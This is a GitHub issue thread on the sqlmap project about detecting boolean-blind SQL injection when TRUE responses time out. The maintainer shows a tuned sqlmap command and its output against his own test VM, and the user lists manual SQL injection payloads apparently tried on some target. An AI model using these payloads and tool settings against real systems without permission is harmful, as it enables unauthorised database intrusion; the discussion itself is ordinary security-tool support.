### ISSUE TITLE
How to setup sqlmap for boolean blind SQLi if true statement is timeouted page?

### ISSUE THREAD

**Issue by aninax** [sqlmapproject/sqlmap#4196]
Hi,
How to setup sqlmap for boolean blind SQLi if true statement is timeouted page(blank with no error code - connection timeout)?

Thanks

**Comment by stamparm** [comment]
Hi.

I miss info whether there was a timeout in the original page or not and whether you have something "specific" for the FALSE page.

I assumed that the original page was ok and that the FALSE page indeed returned something distinguishable (preferable some specific string not appearing in original page). Anyhow, I made one such vulnerable target in VM, where original page returned some data, FALSE page returned string `No results`

(notice the usage of `--not-string` because you have to point sqlmap in right direction - in regular cases sqlmap compares TRUE responses to the original content, but as in your case that's not possible, you have to tell sqlmap what to expect in FALSE responses):

```
$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int_timeout.php?id=1"\
 --flush-session --batch --timeout=5 --ignore-timeouts --not-string="No results"\
 --technique=B
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.5.12#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:21:42 /2020-05-11/

[12:21:43] [INFO] testing connection to the target URL
[12:21:43] [INFO] testing if GET parameter 'id' is dynamic
[12:21:43] [INFO] GET parameter 'id' appears to be dynamic
[12:21:48] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[12:21:48] [INFO] testing for SQL injection on GET parameter 'id'
[12:21:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:21:53] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[12:21:53] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 13 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2657=2657
---
[12:22:18] [INFO] testing MySQL
[12:22:23] [INFO] confirming MySQL
[12:22:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[12:22:33] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/debiandev'

[*] ending @ 12:22:33 /2020-05-11/
```

BR

**Comment by aninax** [comment]
Thanks, but issue is that True statement is when it timeout:
-1' OR 2+441-441-1=0+0+0+1 -- => TRUE
-1' OR 3+441-441-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+441-441) -- => FALSE
-1' OR 3*2>(0+5+441-441) -- => FALSE
-1' OR 2+1-1-1=1 AND 000441=000441 -- => TRUE
-1' OR 000441=000441 AND 3+1-1-1=1 -- => FALSE
-1' OR 3*2=5 AND 000441=000441 -- => FALSE
-1' OR 3*2=6 AND 000441=000441 -- => TRUE
-1' OR 3*2*0=6 AND 000441=000441 -- => FALSE
-1' OR 3*2*1=6 AND 000441=000441 -- => TRUE

**Comment by stamparm** [comment]
Can you please read carefully what I wrote at least three times and tell me
how is that different than your case?

**Comment by stamparm** [comment]
My last message here, because it seems that we have some communication issues. I even wrote the following testing page yesterday to test this case of yours, while it seems that it didn't suit your needs:

![1](https://user-images.githubusercontent.com/921555/81651198-cc97d680-9432-11ea-9e70-43720e79fd7c.png)

This basically means that in case of FALSE evaluation (i.e. no results) there won't be a timeout, while in case of TRUE evaluation (i.e. any results) there will be an **"over 9000!!!"** timeout
